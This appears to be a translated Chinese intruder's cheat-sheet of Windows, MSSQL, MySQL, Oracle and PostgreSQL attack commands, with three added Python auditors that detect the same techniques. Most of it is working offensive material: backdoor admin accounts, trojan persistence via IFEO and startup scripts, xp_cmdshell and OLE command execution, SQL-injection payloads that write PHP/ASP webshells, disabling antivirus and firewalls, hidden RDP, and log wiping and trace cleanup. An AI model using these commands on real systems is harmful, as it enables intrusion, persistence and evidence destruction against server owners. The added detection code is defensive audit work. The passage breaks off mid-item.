1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you log straight in; once inside, run net user administrator /passwordreq:yes to put it back.

2. A fairly clever way to build a cloned account
First create an ordinary user account;
then export its registry key and delete the account in Computer Management;
then import the key again and add the account to the Administrators group.

3. Reading the radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg

4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a subkey named "services.exe",
then create a string value under it
whose data is the full path of the trojan.

5. runas /user:guest cmd
Tests the user's privileges!

6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This actually just relies on the tlntadmn command. To learn more, run it with /? and have a look. (This one needs administrator privileges.) Creating an identical user and passing NTLM authentication needs no explanation from me, right?

7. After the intrusion: patching holes, cleaning traces, placing backdoors:
The basic holes must be patched, e.g. SU privilege escalation, SA injection and the like. For DBO injection consider killing xp_treelist and xp_regread, and make a note of the web directory yourself; you must remember to clean up your traces. For SQL Server connections, Enterprise Manager is the better choice; Query Analyzer leaves records at HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers. Delete them. When clearing IIS logs do not use an AIO-type tool to wipe the logs completely; use a logcleaner-type tool that only deletes the entries for a specified IP. If you can get the administrator password via gina, log in as them, clean the logs, and use WYWZ for the final trace cleanup. That said, manual cleanup is safer. Finally leave a backdoor that produces no log entries. I never go without several one-liner backdoors, a standard backdoor and a cfm backdoor. Remember to fix the timestamps. And one more rather ruthless trick: if the machine is just an ordinary zombie, drop a TXT on the administrator's desktop telling them you broke in, planted a certain backdoor and added a certain user (not your real important backdoor, of course) and asking them to clean it up. That way there is a good chance your real backdoor survives.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'
9. MSSQL Server 2005 sets xp_cmdshell to ON by default;
to enable it you have to add it under the advanced options.
You can inject it right at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
After an extended stored procedure has been deleted there is a very simple way to restore it:
Delete:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
This restores them directly, without caring whether sp_addextendedproc still exists.
-----------------------------

Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means OK.

Restore xp_cmdshell:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means OK.

Otherwise upload xplog70.dll:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL statement to block cmdshell:
sp_dropextendedproc "xp_cmdshell"
-------------------------
Clearing the 3389 login records with a command that ships with the system:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
Checking the current user's privileges in MySQL:
show grants for

The statements below carry the same privileges as the ROOT user. Everyone must have run into this when taking a site: the root user of MySQL can only connect locally and refuses remote connections. The following method solves that problem: the statements create a user itpro with password 123 and the same privileges as root, allowed to connect from any host, so you can conveniently operate the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you are done, remember to remove your footprints.
Drop USER 'itpro'@'%';
Drop DATABASE IF EXISTS `itpro` ;
Getting SYSTEM privileges as the current user:
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD

Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec",user)
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Bypassing the captcha restriction to get into the back end and obtain a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save as code.reg, import it into the registry, restart IE
and that's it.
Writing a shell via UNION
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
Used on the DedeCMS injection vulnerability; writes the shell without touching the back end.

In the DedeCMS back end, when there is no file manager and no outfile privilege:
under Plugin Management -> Virus Scan
write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format above.
In Oracle, after logging in as a low-privileged user, the following statement queries the hashes of sys and the other users, which you then crack with Cain.
Code:
select username,password from dba_users;
MySQL remote-connection user
Code:
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
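Added example (my own Python, not code from these notes or from MySQL): an audit of SHOW GRANTS output that flags exactly the properties of the accounts created in the two GRANT blocks above, a '%' or wildcard host, ALL PRIVILEGES on *.*, the FILE privilege (which INTO OUTFILE needs) and WITH GRANT OPTION. SAMPLE_GRANTS is constructed; the password hash in the first line is a made-up placeholder, and the rule wording is mine.

```python
import re

# Constructed sample: SHOW GRANTS lines for four accounts. The first two are the
# "root-equivalent, any host" accounts the statements above create; the third is
# a normal application account; the fourth has FILE on a wildcard subnet.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY PASSWORD '*PLACEHOLDERHASH' WITH GRANT OPTION",
    "GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' WITH GRANT OPTION",
    "GRANT SELECT, INSERT, UPDATE ON `forum`.* TO 'webapp'@'localhost'",
    "GRANT FILE ON *.* TO 'backup'@'10.0.0.%'",
]

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'(?P<rest>.*)$",
    re.IGNORECASE,
)

def parse_grant(stmt):
    """Split one SHOW GRANTS line into its parts; None if it is not a GRANT."""
    m = GRANT_RE.match(stmt.strip())
    if not m:
        return None
    privs = [p.strip().upper() for p in m.group("privs").split(",")]
    rest = m.group("rest").upper()
    return {
        "user": m.group("user"),
        "host": m.group("host"),
        "scope": m.group("scope"),
        "privs": privs,
        "grant_option": "WITH GRANT OPTION" in rest,
    }

def audit_grant(stmt):
    """Findings for one GRANT line; an empty list means nothing to flag."""
    g = parse_grant(stmt)
    if g is None:
        return []
    findings = []
    who = "'%s'@'%s'" % (g["user"], g["host"])
    if g["host"] == "%":
        findings.append("%s: reachable from any host ('%%' wildcard)" % who)
    elif "%" in g["host"]:
        findings.append("%s: host pattern contains a wildcard (%s)" % (who, g["host"]))
    if g["scope"] == "*.*" and "ALL PRIVILEGES" in g["privs"]:
        findings.append("%s: ALL PRIVILEGES on *.* (root-equivalent)" % who)
    if g["scope"] == "*.*" and "FILE" in g["privs"]:
        findings.append("%s: FILE privilege (can write files with INTO OUTFILE)" % who)
    if g["grant_option"]:
        findings.append("%s: WITH GRANT OPTION (can create further privileged accounts)" % who)
    return findings

def audit_all(statements):
    """Run audit_grant over every line and concatenate the findings."""
    out = []
    for s in statements:
        out.extend(audit_grant(s))
    return out

if __name__ == "__main__":
    for finding in audit_all(SAMPLE_GRANTS):
        print(finding)
```

Feed it the real output of SHOW GRANTS FOR each row of mysql.user; an account that trips the first two checks at once is the signature left behind when the cleanup step (Drop USER) is forgotten.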
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1. Querying the terminal services port

XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enabling terminal services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3. Changing the terminal port to 20008 (0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Removing the XP & 2003 system firewall's restriction on the terminal services port 3389 and on connecting IPs

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5. Enabling the terminal on Win2000, port 3389 (requires a reboot)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg

6. Forcing a reboot of Win2000 & Win2003 (the system reboots by itself after the last line runs)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. Disabling TCP/IP port filtering (requires a reboot)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. When the terminal has exceeded its maximum number of connections, the following command still connects

mstsc /v:ip:3389 /console

9. Adjusting NTFS partition permissions
cacls c: /e /t /g everyone:F (everyone gets full control of the C: drive)

cacls %systemroot%\system32\*.exe /d everyone (deny everyone access to the exe files in system32)

------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Deleting the registry value for awgina.dll
Code:
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
Set it to 1 to turn off the LM hash.
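Added example (my own Python, not code from these notes): a parser for exported .reg files that checks the registry values the notes above touch, namely a Debugger entry under an Image File Execution Options subkey (item 4 at the top), a GinaDLL value under Winlogon, fDenyTSConnections and the two RDP PortNumber values, and NoLMHash. SAMPLE_REG is a constructed export, not taken from any real host; the key paths are the ones quoted in the notes and the severity labels are mine. The same parser works on the output of regedit /e or reg export.

```python
import re

# Constructed sample export (not from any real host) in the REGEDIT4 /
# "Windows Registry Editor" text format. It carries one entry of each kind the
# notes discuss, plus a harmless IFEO subkey that must not be flagged.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe]
"Debugger"="C:\\Windows\\Temp\\mm.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"DisableHeapLookaside"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL"="awgina.dll"
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000000
'''

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VAL_RE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|(?P<default>@))=(?P<data>.*)$')

def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: data}}.
    dword: data becomes an int, quoted strings are unescaped, anything else is kept raw."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor") or line == "REGEDIT4":
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group("key")
            keys.setdefault(current, {})
            continue
        m = VAL_RE.match(line)
        if m and current is not None:
            name = m.group("name") if m.group("name") is not None else "@"
            data = m.group("data")
            if data.lower().startswith("dword:"):
                data = int(data[6:], 16)
            elif data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            keys[current][name] = data
    return keys

IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
TS = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
LSA = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"

def audit_reg(keys):
    """Return (severity, message) findings for the settings the notes change."""
    findings = []
    ifeo_prefix = IFEO.lower() + "\\"
    for key, values in keys.items():
        # Any image with a Debugger value is launched through that program instead.
        if key.lower().startswith(ifeo_prefix) and "Debugger" in values:
            exe = key[len(IFEO) + 1:]
            findings.append(("high", "IFEO Debugger set for %s -> %s" % (exe, values["Debugger"])))
    gina = keys.get(WINLOGON, {}).get("GinaDLL")
    if gina is not None:
        findings.append(("high", "Winlogon GinaDLL is set to %s (a custom GINA sees every logon)" % gina))
    if keys.get(TS, {}).get("fDenyTSConnections") == 0:
        findings.append(("medium", "Terminal Server connections are enabled (fDenyTSConnections=0)"))
    for sub in (r"\Wds\rdpwd\Tds\tcp", r"\WinStations\RDP-Tcp"):
        port = keys.get(TS + sub, {}).get("PortNumber")
        if isinstance(port, int) and port != 3389:
            findings.append(("medium", "RDP PortNumber under %s is %d, not the default 3389" % (sub, port)))
    nolm = keys.get(LSA, {}).get("NoLMHash")
    if nolm != 1:
        findings.append(("low", "NoLMHash is %r; set it to 1 so LM hashes are no longer stored" % (nolm,)))
    return findings

if __name__ == "__main__":
    for severity, message in audit_reg(parse_reg(SAMPLE_REG)):
        print(severity, message)
```

Run it against a fresh export of the three hives above and diff the findings against a known-good export of the same machine; the IFEO and GinaDLL checks are the ones worth alerting on immediately, the RDP and NoLMHash ones are configuration drift.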
Database security: commonly used commands for breaking into Oracle databases
Recently I ran into a server running an Oracle database; after cramming Oracle and consulting some experts I finally got all the user passwords for the site's back-end admin interface. I found Oracle really cumbersome to operate, so to spare my brothers some detours later I have collected the commands needed during the intrusion.
1. su - oracle    Not required; useful when you do not have the DBA password, as it lets you into the sqlplus interface without one.
2. sqlplus /nolog  or  sqlplus system/manager  or  ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba ;(as sysoper) or
connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup;  Starts the database instance.
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$database;  View the database's structure fields.
7. How to see which users hold the SYSDBA or SYSOPER privilege:
SQL>select * from V_$PWFILE_USERS;
Show user;  Shows the user of the current database connection.
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show the structure of all fields of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in table CQI.T_BBS_XUSER:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant privileges to the user:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change a database user's password: (changes the passwords of sys and system to test)
alter user sys identified by test;
alter user system identified by test;
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml   database connection configuration
\WEB-INF\server.xml                  the equivalent of http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml           file and directory structure

spring.properties contains the name of the hibernate.cfg.xml

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of these can be found, go and look at the class files.
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:

create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
Viewing the shared folders from inside a virtual machine:
run in the VM's cmd
\\.host\Shared Folders

Tricks for finding the terminal service from a cmdshell
Finding the terminal:
Step 1: Tasklist /SVC lists all processes and system services with their PIDs.
  The service name of the terminal is TermService.
Step 2: use netstat -ano to list the PID behind every port,
  and find the port that matches that PID.

Querying the password hash in SQL Server 2005
SELECT password_hash FROM sys.sql_logins where name='sa'
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
Exporting a shell from Access.
Complete code for adding a user through MySQL on a Chinese-language operating system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English-language version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe'
drop table a;
A note on how to deal with that nasty Norton
Check the path of the Norton service:
sc qc ccSetMgr
Then set the permissions to deny access. Go all the way..
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server
iisreset /reboot
And that takes care of it.. But once you are done, remember to restore the permissions....
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F

SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
Some notes on PostgreSQL injection
How to get a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs a user-defined C function, the other uses pl/python.
Of course, for these the PostgreSQL version has to be above 8.X.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, writing its output to a file:
SELECT system('uname -a > /tmp/test')

COPY the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the command's output back from the output table to check whether it succeeded:
SELECT system_out FROM stdout

Below is a test example:

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
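Added example (my own Python, not code from these notes): a detector that runs over SQL statements as a query log, WAF or reverse proxy would record them, undoes the two cheap evasions the notes rely on (URL encoding of an injected parameter, and T-SQL string concatenation of the EXEC('ma'+'ster..x'+'p_cm'+...) kind), and then matches the primitives used across the MSSQL items 8 to 10, the DedeCMS UNION ... INTO OUTFILE payload, and the PostgreSQL COPY-to-file and C-function steps above. SAMPLE_STATEMENTS is constructed from the shapes of those payloads plus benign controls; the rule names and the URL heuristic are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: statements as a query log or WAF might record them. The
# injected ones follow the shapes of the payloads in these notes; the others
# are benign controls that must not be flagged.
SAMPLE_STATEMENTS = [
    "SELECT name FROM users WHERE id=5",
    "id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--",
    "EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')",
    "declare @shell int exec sp_oacreate 'wscript.shell',@shell output",
    "q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\\\wwwroot\\\\x.php'+/*",
    "id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;",
    "CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT",
    "COPY users FROM STDIN",
]

# 'a'+'b' -> 'ab', applied repeatedly so any number of pieces collapse.
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# Heuristic: a leading "name=" or any %XX escape marks a URL-encoded parameter.
URLISH_RE = re.compile(r"^\w+=|%[0-9a-fA-F]{2}")

# (rule name, pattern) evaluated against the normalized, lower-cased text.
RULES = [
    ("mssql.xp_cmdshell", re.compile(r"xp_cmdshell")),
    ("mssql.ole_automation", re.compile(r"sp_oa(create|method)")),
    ("mssql.sp_configure", re.compile(r"sp_configure\s*'(show advanced options|xp_cmdshell|ole automation procedures)'")),
    ("mssql.addextendedproc", re.compile(r"addextendedproc")),
    ("mssql.xp_dirtree", re.compile(r"xp_dirtree")),
    ("mysql.write_file", re.compile(r"\binto\s+(out|dump)file\b")),
    ("postgres.c_function", re.compile(r"create\s+function\b.*\blanguage\s+'?c\b")),
    ("postgres.copy_file", re.compile(r"\bcopy\s+\S+(\s*\([^)]*\))?\s+(from|to)\s+('|\$\$)")),
]

def normalize(stmt):
    """URL-decode parameter-style input, collapse string concatenation,
    squeeze whitespace and lower-case, so the rules see the effective text."""
    text = stmt
    if URLISH_RE.search(text):
        text = unquote_plus(text)
    while True:
        merged = CONCAT_RE.sub(r"'\1\2'", text)
        if merged == text:
            break
        text = merged
    return re.sub(r"\s+", " ", text).lower()

def analyze(stmt):
    """Names of the rules that fire for one statement, in RULES order."""
    text = normalize(stmt)
    return [name for name, pattern in RULES if pattern.search(text)]

def scan(statements):
    """(index, statement, rules) for every statement that trips at least one rule."""
    hits = []
    for i, stmt in enumerate(statements):
        rules = analyze(stmt)
        if rules:
            hits.append((i, stmt, rules))
    return hits

if __name__ == "__main__":
    for i, stmt, rules in scan(SAMPLE_STATEMENTS):
        print("%d %-28s %s" % (i, ",".join(rules), stmt[:60]))
```

The concatenation pass is what makes the difference for the obfuscated EXEC line: without it the text never contains the string xp_cmdshell. Dynamic SQL built by other means (CHAR() chains, nested EXEC of a variable) needs further unfolding; this block deliberately covers only the forms that appear in the notes.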
net stop sharedaccess                                 stop the default firewall
netsh firewall show config                            show the default firewall's configuration
netsh firewall set notifications disable              disable the notification shown when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost    add a program that the default firewall allows through
How to change the 3389 port (after the change it is not easily found by a scan)
Change the port setting on the server side; there are two places in the registry to modify:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
The PortNumber value, 3389 by default; change it to the port you want, e.g. 6000.

Second place:
